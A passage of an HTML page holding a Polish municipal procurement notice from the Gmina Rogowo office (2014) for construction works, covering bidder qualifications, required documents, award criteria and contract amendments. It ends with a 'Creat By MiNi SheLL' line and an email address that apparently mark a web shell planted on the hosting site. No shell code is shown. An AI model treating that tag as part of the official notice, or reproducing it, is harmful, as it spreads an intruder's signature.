Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek  za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi będącymi przedmiotem zamówienia o specjalnościach min.  w ograniczonym zakresie:
- konstrukcji budowlanych,
- sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych      wodociągowych  i  kanalizacyjnych
wraz z aktualnym zaświadczeniem potwierdzającym członkostwo w Izbie Inżynierów Budownictwa. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku. 
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy (Załącznik nr 2 do SIWZ) potwierdzającego spełnienie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty nie wymienione w ust. 1-9 niniejszego rozdziału SIWZ:
a)wypełniony i podpisany przez Wykonawcę formularz oferty Załącznik nr 1 
do SIWZ;
b)projekt umowy (zaparafowany na każdej stronie) stanowiący Załącznik nr 13 
do SIWZ;
c)sporządzony kosztorys ofertowy opracowany na podstawie przedmiaru robót;
d)Wykonawca prowadzący działalność gospodarczą winien do oferty dołączyć     dokument rejestrowy wykazujący do reprezentowania podmiotu, a w przypadku osób fizycznych wydruk z Centralnego Ewidencji I Informacji O Działalności Gospodarczej (CEIDIG) w Rzeczypospolitej Polskiej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a dotyczących:
1)zmiany kierownika robót bądź osób wskazanych do kontaktu w sprawach realizacji umowy w przypadku zdarzeń uniemożliwiających wykonywanie przez nich wskazanych funkcji; 
2)zmiany terminu zakończenia realizacji inwestycji:
a)z powodu okoliczności siły wyższej tj. klęski żywiołowej, warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych;
b)w przypadku prowadzenia badań w wykopaliskach archeologicznych;
3)zmiany obowiązującej stawki podatku VAT:
a)zmiana stawki VAT dotyczyć będzie ceny kontraktowej, w części jakiej dotyczą      te zmiany przepisów.
4)zmiany sposobu wykonania robót budowlanych na skutek zmian technologicznych spowodowanymi następującymi okolicznościami:
a)niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości robót;
c)pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
d)konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groził niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
e)odmienne od przyjętych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
f)	konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 4 możliwa jest w szczególności zmiana sposobu wykonania, materiałów i technologii robót.
Zmiana wynagrodzenia Wykonawcy jest możliwa w przypadkach wskazanych wyżej, na zasadach określonych w warunkach umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htt://rogowo.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rogowo
ul. Kościelna 8
88 - 420 Rogowo k/Żnina.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2014 godzina 11:00, miejsce: Urząd Gminy Rogowo ul. Kościelna 8, 88-420 Rogowo pok. 3-sekretariat (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com